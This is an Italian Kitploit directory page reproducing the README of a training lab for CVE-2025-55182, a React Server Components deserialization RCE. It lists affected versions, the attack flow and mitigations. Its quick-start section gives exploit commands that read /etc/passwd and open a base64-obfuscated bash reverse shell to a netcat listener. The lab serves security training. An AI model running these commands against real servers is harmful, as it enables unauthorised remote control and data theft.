Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/alsaut1/react2shell-lab
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e FormazioneStrumento di Accesso RemotoSviluppo PayloadLab e Pratica
GitHubalsaut1/react2shell-lab

react2shell-lab

78 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182 React2Shell PoC lab

Vedi Repository

React2Shell - CVE-2025-55182 Laboratorio

Un laboratorio completo per dimostrare e testare la vulnerabilità critica CVE-2025-55182 nei React Server Components.

⚠️ Solo a Scopo Educativo

Questo repository è destinato a:

  • Ricerca e formazione sulla sicurezza
  • Comprensione dei meccanismi delle vulnerabilità
  • Test sui propri sistemi
  • Preparazione per bug bounty

Non utilizzare contro sistemi di cui non si è proprietari o per i quali non si ha esplicito permesso di test. L'accesso non autorizzato è illegale.

🔴 Dettagli della Vulnerabilità

  • CVE ID: CVE-2025-55182
  • Punteggio CVSS: 10.0 (Critico)
  • Tipo: Esecuzione remota di codice non autenticata (RCE)
  • Componenti interessati:
    • React 19.0.0 - 19.2.0
    • Next.js 15.x - 16.x
  • Causa principale: Deserializzazione non sicura nel protocollo "Flight" di React Server Components

⚡ Capacità

✅ Eseguire comandi arbitrari senza autenticazione
✅ Leggere file di sistema
✅ Creare e modificare file
✅ Stabilire connessioni reverse shell
✅ Ottenere il controllo completo del server

🚀 Avvio Rapido

1. Installazione

root@kitploit:~
npm install --legacy-peer-deps
npm run dev

Il server si avvierà su http://localhost:3000

2. Verifica della Vulnerabilità

root@kitploit:~
bash check-cve.sh

3. Esecuzione degli Exploit

root@kitploit:~
cd exploit
python3 rce_final.py "whoami"
python3 rce_final.py "id > /tmp/id.txt &"
python3 rce_final.py "cat /etc/passwd > /tmp/passwd.txt &"

4. Reverse Shell

root@kitploit:~
# Terminal 1 - Listener
nc -lvnp 4444

# Terminal 2 - Exploit
python3 rce_final.py "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash &"

📁 Struttura del Progetto

root@kitploit:~
├── app/              # Applicazione Next.js vulnerabile
├── exploit/          # Exploit PoC funzionante
│   └── rce_final.py  # Script exploit principale
├── check-cve.sh      # Check automatico della vulnerabilità
├── package.json      # Dipendenze vulnerabili
└── README.md

🔧 Dettagli Tecnici

La vulnerabilità risiede nella logica di deserializzazione dei payload di React Server Components. L'exploit sfrutta l'inquinamento del prototipo per eseguire codice arbitrario tramite process.mainModule.require('child_process').execSync().

Flusso dell'Attacco

  1. Creare dati multipart del modulo malevoli
  2. Inviare all'applicazione React vulnerabile
  3. Sfruttare la deserializzazione non sicura nel protocollo "Flight"
  4. Ottenere RCE sul server

📊 Impatto

  • Riservatezza: ALTA (leggere qualsiasi file)
  • Integrità: ALTA (modificare/creare file)
  • Disponibilità: ALTA (eseguire comandi di denial of service)

✅ Mitigazione

  1. Aggiornare React alla versione 19.2.1 o successiva
  2. Aggiornare Next.js alla versione 15.0.5+ o 16.0.7+
  3. Implementare regole di Web Application Firewall (WAF)
  4. Monitorare i log del server per tentativi di sfruttamento
  5. Utilizzare meccanismi di protezione runtime

📚 Riferimenti

  • react2shell.com
  • Dettagli CVE-2025-55182
  • Avviso di sicurezza React
  • Calcolatore CVSS

⚖️ Disclaimer Legale

Questo codice è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati. Gli utenti sono responsabili di assicurarsi di avere la giusta autorizzazione prima di testare qualsiasi sistema. L'accesso non autorizzato ai sistemi informatici è illegale secondo leggi come il Computer Fraud and Abuse Act (CFAA) e legislazioni simili in altre giurisdizioni.

L'autore non si assume alcuna responsabilità per l'uso improprio di queste informazioni.

🎓 Risultati di Apprendimento

Dopo aver completato questo laboratorio, capirai:

  • Come funzionano le vulnerabilità di deserializzazione non sicura
  • Tecniche di attacco per inquinamento del prototipo
  • Architettura dei React Server Components
  • Metodi di sfruttamento RCE
  • Pratiche corrette di divulgazione delle vulnerabilità
Scarica lo strumento